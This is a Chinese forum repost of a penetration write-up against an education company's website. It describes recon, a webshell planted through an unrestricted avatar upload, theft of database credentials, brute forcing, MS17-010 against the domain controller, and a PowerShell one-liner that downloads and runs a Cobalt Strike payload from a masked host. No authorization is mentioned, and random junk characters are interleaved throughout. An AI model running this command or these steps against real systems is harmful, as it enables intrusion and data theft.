|
) S/ T6 W" F! W/ x: F 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路0 Q; R( E- C' ~8 Q9 f9 V0 Z, m( q
( t9 I8 {- b; n( X, X$ U: e- v2 J/ D1 {
- R; s( x* A+ V6 k6 Z0 w$ U * m( f7 Y' a4 n9 }) x3 y7 C+ g' Y
$ c4 X0 y8 \! `" B
正文+ T1 k, {0 Z' M2 w/ B* x: u9 ?
0 t! Q% M1 G! C n# I
$ u" ?6 v; I2 {) T X7 d" ^
! H. W0 t" ^ @) B
+ Q4 ]% F( ]+ r, I5 z
; m& g& a8 g7 k( j4 S" ]* e n 目标:www.xxxx.com(一家教育机构)
7 Z" n: Q5 x2 S% I$ m; I/ U
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
( R# F" Q c9 g$ V
- u! L+ i) z9 j: _* x) J3 S! ]) X# U6 u6 t5 K$ y/ H9 o
 * V' p6 g9 T7 x4 t; A& d
0 ~% z3 ~ E' C" F/ E
; B! ?" V- N& w: B
进行了简单的信息搜集
7 @$ @- R" H2 W+ d0 H
+ e3 J, J) p: O- W' }# }" C( x" D! [
0 _" ~/ b# q9 F: E9 F$ e. p. w
3 ]0 Z M* [" b4 [2 _0 H 子域名搜集( ~/ B9 u9 M5 M& p1 G
4 E, S) h0 z7 ~/ z3 X' U7 V
1 _# q9 Q. l: p8 I( ]" x/ B  & l$ H/ a; ^ g$ U6 ?
" g. [4 q% b2 h4 ^% i
) V$ G$ U+ o) j+ Z fofa找资产
- z& _; W2 s; x) A5 S
( X' L, ]) U8 Q' H
) t2 n9 R6 t0 ~' P/ i7 k% } * K3 N# T' q7 I
. I1 z6 `5 N7 T) j4 o" h, [) `$ Y  5 h# m7 K# t" {* o! E+ q
" `& n/ M1 w9 \3 ~& _( f7 T7 G
! \$ k% k% M. ^$ d- X4 c
一共七个资产。去重之后只有两个。
5 u8 S/ z* \" w% u* _7 L
, @/ d/ f8 f/ g
* v0 G2 U+ j+ L& ^6 [. s( O2 [
+ _. L5 p# _% r$ _8 b6 X0 {* g. K1 j5 A" e( k
目录探测
& [9 _( Q X& }1 v* s& B 8 ^. H& O2 N0 D: H# g, U; o0 u
+ N" o& W- F+ T  - m7 o) m L4 X! P
; T) Y6 A6 a+ R, U0 X0 X1 d
3 E$ l/ `# L! s+ i) U) q 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- w% s# q1 V. e
3 c6 n5 i0 \ n$ |; F! a. a
" p7 d, Z* [1 `* L) K/ I5 l
& J) L9 K0 j1 M/ C# @- a4 l
: x. w# a, H) k1 V- W" O" J, v 我又尝试了通过修改返回包来绕过登录界面
+ `4 z0 R) X. J8 Q$ G/ d1 O
& C/ l/ ? K0 Z! J/ c" {2 y
) d8 C2 }9 J9 C" V& o# x* r 
% L; y1 I# O4 B/ Y$ L5 r
+ O: i o4 ], Q- i" j& c% \/ N$ Q5 v& O) j
还是不行,尝试注入无果4 }5 J0 D r9 d$ S
b' O8 ?6 ^3 g6 z$ V" m( X
, K y/ B% c/ \, W F3 t  9 l/ q: R; s) O7 K1 P4 ~2 X& a* O1 ~, d
) j' J& U" v: M+ G! f! D+ V4 a& H, g5 m
不过我目录探测出了一处Spring信息泄露
6 T6 ?; F( M4 Y. M+ H1 s
- W8 ]2 ?* s& v. R- n' n2 m* T: P! u4 b5 a
% b# ]4 ~& R6 k! u
3 G4 e. N# c0 K/ _0 z+ N  2 A Y; S% m3 t
; v* T5 T0 w$ v
/ r; c/ u! ^8 p7 n) _ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
+ i" Q+ Y, l) j1 g
0 L3 m Q9 X& z E: }4 [% [. e# E1 Q5 Q1 J$ x' \" B2 v
5 o8 \8 N9 {) I6 ]
% I! W: D7 B4 p/ c% Z( z1 j: [
. d# S2 @. l3 E9 e, D. K0 x 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
" x" b( \% {. F: ~4 C% V" A 9 I8 W7 n3 I# X; }" a* b* l L
- r: w; _' j5 C4 X. O9 _; _
" F5 B# D& Q1 r5 |9 M. o 1 M5 `- ^" U" ?
# u5 R$ e9 F7 H: ]+ g/ R
获取有些师傅到这一步就手机抓包电脑测了。
. ^# P# t4 D$ F3 d+ T; u6 S
' o: j1 u1 z" H% ?5 V0 |; D" l
* X' R( V$ |) G; ~+ Q: a Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。$ y; C3 d: ]7 X2 P' d8 J
4 \7 [% s9 z- f9 w: ~0 n) q
$ S. s o0 y6 M2 {, K% ?2 L 其中在一个公众号发现了小程序,可以进行注册。
V5 E( h9 `# ^+ W# O
! H8 ~8 a+ Y( m
& v! X' j- E# q, s( L8 r9 a 看到了头像上传,尝试上传获取WebShell- W6 m$ `" j$ O+ y, n& D6 M! F- S
; _6 W" a$ G: ^7 A3 P: D" N) u& M
6 n0 q. z. E# y6 j& X
 1 W% @( K" ]- t: W/ f9 W
! r" _$ D2 \7 _
, @( ? v# y$ |: Y5 |3 P& W+ x9 I 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
- f: N& G3 T' z6 S( q: X
8 I# m& O9 e7 O/ P3 ] W( A- {1 D2 d
 5 S ]7 t0 [7 f D3 x
0 k! ?' E) n5 h6 v$ a7 ?- u
* ^6 Z {" p6 B) }$ m 然后上了大马
7 o8 t' {' K- e8 Y
6 ~8 \7 f8 z1 E u8 Q; q# ~/ P* Z; B' w1 B
) }- c4 O0 p! u3 I; B; w j8 o ( A! D" E, B( D
9 }( Y: f: G9 o: I& o- y
 . m A0 k+ l- P& \
3 p9 P/ b! k1 g
|. [; H. w& _! [- w, i" C 通过翻找文件发现数据库账号密码. v0 M6 b9 `* i2 G% d7 V
1 G* C0 r' g% |8 f# q* Y
% @ c/ ?6 d/ H! ]
 ) L1 U* ]3 }- a$ i8 v
X3 }% k& P/ G
/ I% r1 g, B. s+ j/ } --内网渗透8 \3 ?& b: r9 C0 \9 E5 }
7 O, s* I+ ]. N' X: g
7 ~1 ]' m' k- T9 E6 U0 @* r
直接通过powershell执行 cs上线& n3 x# e: A/ C: H4 S
! F) o Q: w3 \# z# W
. x- [0 }$ h& p* `! C5 }# ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"1 {* t0 t4 [4 S- m2 S4 o" Q* A" }
5 M; a' F, Q- R# Q+ Q
. H6 e! ^9 ~: |- c
 / D9 C# L$ F( |
3 W" G+ I$ k3 f+ h- k
9 w+ C( C4 e2 F9 O& K/ _- @' j 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
9 i2 R/ Q# Q! H I4 [
4 e; I( A- M& h7 J3 x7 J) ^$ [1 o" F/ L7 I% f/ F0 v& X4 y) g4 z
1 ^: P7 _# m9 U) @. P9 p
6 Y+ c P, K. d2 _2 s1 D5 W. M% V
6 s* B$ a3 @4 y. Y) I 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, h( ?0 E' D1 S/ S; z( w; l
* r: l- o1 J( ]: N8 D* x
. h6 P2 d8 Z6 v1 C) ~/ D# d
# q. k* ~3 f6 w9 G( m ; p; K; n) K5 ~1 c: H8 l7 l+ x, |
) ~- |, n h( D0 ?2 L' a9 W: ?! \5 i. [
* ?& _, ?5 N( r) u; G( i6 O
- f4 j4 m9 H7 R4 e6 m6 u
" D T! _3 _1 s# e 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
0 `" f- a% \* R" f
4 T& z( o1 v9 k1 o( o9 j2 W* K
0 |. K" s% a4 x 3 A+ A$ Z8 A L5 r+ N
! f2 e" L, U: l, x1 V( U3 T6 }
 ( t4 [9 h$ Q$ W. ~7 U
7 U0 P" M5 l( r4 ]5 \+ w0 `7 r+ O+ _1 `7 k ?
- w! D5 p3 B& j8 Z) r4 o
" M. Z' y3 p4 @% }* P
" u* v( ^8 i$ W ' z% q% X3 t# f9 x; {$ i
" Q* z3 m5 R7 B& e# i8 n e
7 D4 z9 H9 ]8 r% _ ! M" o/ u( z% {) b" X5 ]
" a _' h6 {) p0 T% m6 a8 F) O5 y/ _
小结
/ n N3 v N- Y
8 O8 \9 t. F# z! z) B" v* _+ L7 N5 N( n8 B- Z% T9 N
' z4 x$ e9 G" e5 G7 B4 ]) Z( |7 B ; y& b) }( x/ q( q+ F$ h) M
4 S, R: ]& \4 h8 V, z6 F" D! r
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' K, u3 ]$ n+ h) P4 m' M
- j7 a* z) x; }( _ q) J6 J) X0 @+ }
" r! B+ O( ]/ r% U, w9 P& P # U2 f9 D/ z( f
2 q8 P& R& e2 G0 Z, Y" ~" u
& k* R ~# O* K -
4 H1 C, O& x7 `2 f0 }/ w3 Q9 j , N. P( E8 m3 T/ L" Z
, ?4 ~) l. s$ R2 I. ^$ t$ d
- 2 j; n# X; N6 q9 w1 @0 E
' O( _. u5 I4 F) M3 W$ c* A
2 {1 N. |7 e; A6 R1 |
6 N, ]( I% p7 I' m$ T) s4 N+ V
9 c4 X; {1 K [. @% | o 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html e4 Z2 v5 f- ~$ F
3 ]' y) ]8 Q* h0 c; f- G }1 \& H% Y1 B/ |2 f" [; Q+ H. k, f2 @
: Z: y) o5 H8 M: s @* Z' Z; |. n | 
发表于 2024-3-1 19:41:32
收藏
支持
反对